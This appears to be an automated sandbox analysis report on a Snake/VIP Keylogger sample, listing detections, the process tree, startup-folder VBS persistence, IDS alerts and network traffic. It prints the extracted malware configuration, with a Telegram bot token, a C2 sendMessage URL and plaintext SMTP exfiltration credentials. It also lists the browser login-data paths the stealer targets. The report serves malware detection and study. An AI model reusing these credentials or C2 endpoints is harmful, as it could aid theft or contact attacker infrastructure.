Windows Analysis Report
mKRflLn5sx.exe

Overview

General Information

Sample name: mKRflLn5sx.exe (renamed because original name is a hash value)
Original sample name: 0a0777441380c8bff668c4ef87b88334f9b26c3d45f3a9b2a4059cc893cb3244.exe
Analysis ID: 1631785
MD5: e5e246a339b3295d2c1f72cbfbae9b97
SHA1: d3df90ea88f66bf2584b20e288bf91126a050286
SHA256: 0a0777441380c8bff668c4ef87b88334f9b26c3d45f3a9b2a4059cc893cb3244
Tags: exe, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mKRflLn5sx.exe (PID: 5500 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
    • Glagolitic.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
      • RegSvcs.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\mKRflLn5sx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Glagolitic.exe (PID: 5168 cmdline: "C:\Users\user\AppData\Local\croc\Glagolitic.exe" MD5: E5E246A339B3295D2C1F72CBFBAE9B97)
      • RegSvcs.exe (PID: 5944 cmdline: "C:\Users\user\AppData\Local\croc\Glagolitic.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
{"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
Source: 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_SnakeKeylogger_af3faa65
Description: unknown
Author: unknown
Strings:
  • 0xb6be:$a1: get_encryptedPassword
  • 0xb9df:$a2: get_encryptedUsername
  • 0xb4dc:$a3: get_timePasswordChanged
  • 0xb5d7:$a4: get_passwordField
  • 0xb6d4:$a5: set_encryptedPassword
  • 0xcdad:$a7: get_logins
  • 0xccf9:$a10: KeyLoggerEventArgs
  • 0xc95e:$a11: KeyLoggerEventArgsEventHandler

Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_VIPKeylogger
Description: Yara detected VIP Keylogger
Author: Joe Security

Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_TelegramRAT
Description: Yara detected Telegram RAT
Author: Joe Security

Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_SnakeKeylogger_af3faa65
Description: unknown
Author: unknown
Strings:
  • 0x2d8be:$a1: get_encryptedPassword
  • 0x2dbdf:$a2: get_encryptedUsername
  • 0x2d6dc:$a3: get_timePasswordChanged
  • 0x2d7d7:$a4: get_passwordField
  • 0x2d8d4:$a5: set_encryptedPassword
  • 0x2efad:$a7: get_logins
  • 0x2eef9:$a10: KeyLoggerEventArgs
  • 0x2eb5e:$a11: KeyLoggerEventArgsEventHandler

Source: 5.2.Glagolitic.exe.3830000.1.unpack
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 5.2.Glagolitic.exe.3830000.1.unpack
Rule: JoeSecurity_VIPKeylogger
Description: Yara detected VIP Keylogger
Author: Joe Security

Source: 5.2.Glagolitic.exe.3830000.1.unpack
Rule: JoeSecurity_TelegramRAT
Description: Yara detected Telegram RAT
Author: Joe Security

Source: 5.2.Glagolitic.exe.3830000.1.unpack
Rule: Windows_Trojan_SnakeKeylogger_af3faa65
Description: unknown
Author: unknown
Strings:
  • 0x2babe:$a1: get_encryptedPassword
  • 0x2bddf:$a2: get_encryptedUsername
  • 0x2b8dc:$a3: get_timePasswordChanged
  • 0x2b9d7:$a4: get_passwordField
  • 0x2bad4:$a5: set_encryptedPassword
  • 0x2d1ad:$a7: get_logins
  • 0x2d0f9:$a10: KeyLoggerEventArgs
  • 0x2cd5e:$a11: KeyLoggerEventArgsEventHandler

Source: 5.2.Glagolitic.exe.3830000.1.unpack
Rule: MAL_Envrial_Jan18_1
Description: Detects Encrial credential stealer malware
Author: Florian Roth
Strings:
  • 0x39891:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38f34:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39191:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39b70:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , ProcessId: 6616, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 118.69.190.131, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4400, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49722
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs" , ProcessId: 6616, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\croc\Glagolitic.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T15:50:43.230844+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49684 | 104.21.64.1 | 443 | TCP
2025-03-07T15:50:49.268787+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49689 | 104.21.64.1 | 443 | TCP
2025-03-07T15:50:51.913989+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49692 | 104.21.64.1 | 443 | TCP
2025-03-07T15:50:59.219440+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49701 | 104.21.64.1 | 443 | TCP
2025-03-07T15:51:03.054661+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 104.21.64.1 | 443 | TCP
2025-03-07T15:51:06.161508+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.64.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T15:50:37.156584+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49682 | 193.122.6.168 | 80 | TCP
2025-03-07T15:50:40.997696+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49682 | 193.122.6.168 | 80 | TCP
2025-03-07T15:50:43.950928+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49685 | 193.122.6.168 | 80 | TCP
2025-03-07T15:50:47.107057+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49687 | 193.122.6.168 | 80 | TCP
2025-03-07T15:50:49.685227+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49687 | 193.122.6.168 | 80 | TCP
2025-03-07T15:50:53.669591+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49694 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T15:51:19.238090+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49725 | 149.154.167.220 | 443 | TCP
2025-03-07T15:51:30.732422+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49728 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T15:51:07.840320+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49710 | 149.154.167.220 | 443 | TCP
2025-03-07T15:51:20.212081+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49726 | 149.154.167.220 | 443 | TCP

AV Detection

Source: mKRflLn5sx.exe Avira: detected
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Avira: detection malicious, Label: TR/AD.SnakeStealer.kdvjy
Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Bot Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat id": "5013849544", "Email ID": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587", "Token": "7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0", "Chat_id": "5013849544", "Version": "4.4"}
Source: RegSvcs.exe.4400.3.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendMessage"}
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe ReversingLabs: Detection: 78%
Source: mKRflLn5sx.exe Virustotal: Detection: 63%
Source: mKRflLn5sx.exe ReversingLabs: Detection: 78%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: sales-nguyen@vvtrade.vn
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: qVyP6qyv6MQCmZJBRs4t
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: mail.vvtrade.vn
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: saleseuropower@yandex.com
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: 587
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: 7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor: 5013849544
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack String decryptor:

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: mKRflLn5sx.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49683 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49690 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\mKRflLn5sx.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe Code function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0311F8E9h 3_2_0311F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0311FD41h 3_2_0311FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00E1F8E9h 6_2_00E1F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 00E1FD41h 6_2_00E1FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 065231E0h 6_2_06522DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06520D0Dh 6_2_06520B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06521697h 6_2_06520B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 06522C19h 6_2_06522968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652E0A9h 6_2_0652DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652E959h 6_2_0652E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652F209h 6_2_0652EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652CF49h 6_2_0652CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652D7F9h 6_2_0652D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652E501h 6_2_0652E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652EDB1h 6_2_0652EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652F661h 6_2_0652F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_06520040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652FAB9h 6_2_0652F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652D3A1h 6_2_0652D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 065231E0h 6_2_0652310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 0652DC51h 6_2_0652D9A8

Networking

Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49726 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49710 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49728 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49725 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.8:49722 -> 118.69.190.131:587
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
